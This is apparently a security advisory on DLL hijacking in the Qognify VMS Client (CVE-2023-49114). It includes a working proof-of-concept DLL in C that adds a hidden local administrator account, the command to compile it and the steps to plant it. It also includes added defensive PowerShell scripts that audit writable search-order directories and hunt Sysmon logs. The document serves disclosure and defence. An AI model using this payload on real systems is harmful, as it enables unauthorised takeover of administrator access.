Vendor description
"Qognify, part of Hexagon, helps customers minimize the impact of security, safety and operational incidents. Qognify’s comprehensive portfolio of video management software and enterprise incident management solutions serve thousands of customers around the world in manufacturing, transportation, retail, education, finance, logistics, corrections, critical infrastructure and government."
Source: https://www.qognify.com/about-us/
Business recommendation
The vendor provides a hardening guide for its customers; its recommendations should be implemented to ensure that no DLLs can be preloaded.
SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.
Vulnerability overview/description
1) Local Privilege Escalation via DLL Hijacking (CVE-2023-49114)
The Qognify VMS Client/Viewer application (VMS_Client.exe) is vulnerable to DLL hijacking. On startup, the application attempts to load several DLL files via the Windows DLL search order and fails to find them. At least one of these missing DLL files can be hijacked. This might allow malicious actors with low privileges on a Windows system to escalate privileges if the following pre-conditions are met:
- The attacker can drop a DLL file in a folder within the DLL search order (this requires a misconfiguration of the Windows file system permissions and is not something the attacker can bring about on their own).
- A highly privileged user starts the VMS_Client.exe fat client application.
Proof of concept
1) Local Privilege Escalation via DLL Hijacking (CVE-2023-49114)
For successful exploitation, the attacker needs write access to one of the following directories in the DLL search order:
- The directory from which the application loaded
- The system directory
- The 16-bit system directory
- The Windows directory
- The current working directory (CWD)
- The directories that are listed in the PATH environment variable
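The pre-condition above (a directory in the DLL search order that low-privileged users can write to) is what the vendor's hardening guide is meant to rule out, and it can be audited directly. The following PowerShell script is an added example written for this advisory, not code from SEC Consult or Qognify. It walks the same list of locations (application directory, system directories, Windows directory, current working directory and every PATH entry) and reports any directory whose ACL grants a write-capable right to a principal every standard user belongs to. The VMS client installation path is a placeholder assumption and must be adjusted.

```powershell
# Added example (not from the advisory): find DLL search order directories that
# low-privileged users can write to. Run in the context in which VMS_Client.exe
# is started, because the current directory and PATH are taken from that context.
function Find-WritableSearchOrderDir {
    param(
        # Placeholder: directory the VMS client is loaded from (assumed install path).
        [string]$AppDir = 'C:\Program Files\Qognify\VMS Client'
    )

    # Directories in the Windows DLL search order, in the order the advisory lists them.
    $candidates = @(
        $AppDir,
        "$env:SystemRoot\System32",
        "$env:SystemRoot\SysWOW64",      # 32-bit system directory on 64-bit Windows
        $env:SystemRoot,
        (Get-Location).Path
    ) + ($env:PATH -split ';' | Where-Object { $_ -and $_.Trim() })

    # Principals that every interactive standard user is a member of.
    $lowPrivPrincipals = @(
        'BUILTIN\Users',
        'NT AUTHORITY\Authenticated Users',
        'NT AUTHORITY\INTERACTIVE',
        'Everyone'
    )

    # Bits that allow creating or replacing a file in a directory:
    # WriteData/CreateFiles (0x2), AppendData/CreateDirectories (0x4),
    # GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) as seen in
    # inherit-only ACEs. Modify and FullControl both contain the 0x2 bit.
    $writeMask = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000

    foreach ($dir in ($candidates | Select-Object -Unique)) {
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
            # A PATH entry that does not exist is worth reviewing too: if a
            # low-privileged user can create it, it becomes a hijack location.
            [pscustomobject]@{ Directory = $dir; Finding = 'MISSING'; Principal = ''; Rights = '' }
            continue
        }
        $acl = Get-Acl -LiteralPath $dir
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            # Cast to int so generic-right ACEs (shown as large negative numbers) are handled.
            $rights = [int]$ace.FileSystemRights
            if ($rights -band $writeMask) {
                [pscustomobject]@{
                    Directory = $dir
                    Finding   = 'WRITABLE'
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights.ToString()
                }
            }
        }
    }
}

Find-WritableSearchOrderDir | Format-Table -AutoSize
```

An empty result means none of the listed locations are writable by standard users; every WRITABLE or MISSING line is a directory whose permissions (or existence) should be corrected before the hardening guide can be considered implemented.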
The attacker can use the following C code to create a POC exploit:
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Entry point executed when the DLL is loaded by VMS_Client.exe. */
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH) {
        /* Runs with the privileges of the user who started the client. */
        system("cmd.exe /C net user secconsult P@ssW0rd1sSup3rS6curE /add /Y");
        system("cmd.exe /C net localgroup administrators secconsult /add");
        ExitProcess(0);
    }
    return TRUE;
}
The following command can be used to compile the code and create the DLL file:
x86_64-w64-mingw32-gcc CRYPTBASE.c -shared -o CRYPTBASE.dll
Next, the CRYPTBASE.dll file has to be dropped into one of the previously mentioned folders of the DLL search order. If a user with local administrative permissions starts the VMS Client/Viewer fat client application, CRYPTBASE.dll gets loaded and the malicious code is executed with high privileges. In this POC, the user 'secconsult' is created and added to the local administrators group. By following this approach, the attacker is able to escalate privileges.
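A successful hijack of this kind leaves a clear trace: VMS_Client.exe loads a DLL from somewhere other than the Windows system directories or its own installation directory. The following PowerShell script is an added detection example, not part of the advisory, that hunts for this in Sysmon image-load events (Event ID 7). It goes beyond the single CRYPTBASE.dll case in the POC and flags any DLL loaded by VMS_Client.exe from an unexpected location; the Signed field is included because a dropped attacker DLL will normally be unsigned. It assumes Sysmon is installed with an ImageLoad rule that covers VMS_Client.exe, and that the application directory can be derived from the process image path.

```powershell
# Added example (not from the advisory): hunt Sysmon Event ID 7 (ImageLoad) for
# DLLs loaded by VMS_Client.exe from outside the expected directories.
# Assumes Sysmon logs ImageLoad events for VMS_Client.exe.
function Find-UnexpectedVmsClientDllLoad {
    param(
        [datetime]$Since = (Get-Date).AddDays(-7)
    )

    $systemDirs = @("$env:SystemRoot\System32\", "$env:SystemRoot\SysWOW64\")

    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 7
        StartTime = $Since
    } -ErrorAction SilentlyContinue

    foreach ($evt in $events) {
        # Pull the EventData fields (Image, ImageLoaded, Signed, ...) out of the XML.
        $xml  = [xml]$evt.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        if ($data.Image -notlike '*\VMS_Client.exe') { continue }

        # Expected locations: the system directories and the client's own directory.
        $appDir   = (Split-Path -Parent $data.Image) + '\'
        $expected = $systemDirs + $appDir
        $loaded   = $data.ImageLoaded

        $fromExpected = $false
        foreach ($dir in $expected) {
            if ($loaded.StartsWith($dir, [System.StringComparison]::OrdinalIgnoreCase)) {
                $fromExpected = $true
                break
            }
        }
        if ($fromExpected) { continue }

        [pscustomobject]@{
            Time    = $evt.TimeCreated
            Process = $data.Image
            Dll     = $loaded
            Signed  = $data.Signed
        }
    }
}

Find-UnexpectedVmsClientDllLoad | Sort-Object Time | Format-Table -AutoSize
```

Any hit where the DLL name is one the client normally resolves from System32 (CRYPTBASE.dll in the POC above) but the path points at a user-writable directory is a strong indicator that the hijack described in this advisory has taken place, and the directory in question should be treated as compromised.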
Vulnerable / tested versions
The following version was tested; it was the latest version available at the time of the test:
- 7.2
According to the vendor, all versions starting from 7.1 are affected. Users should implement the hardening guide.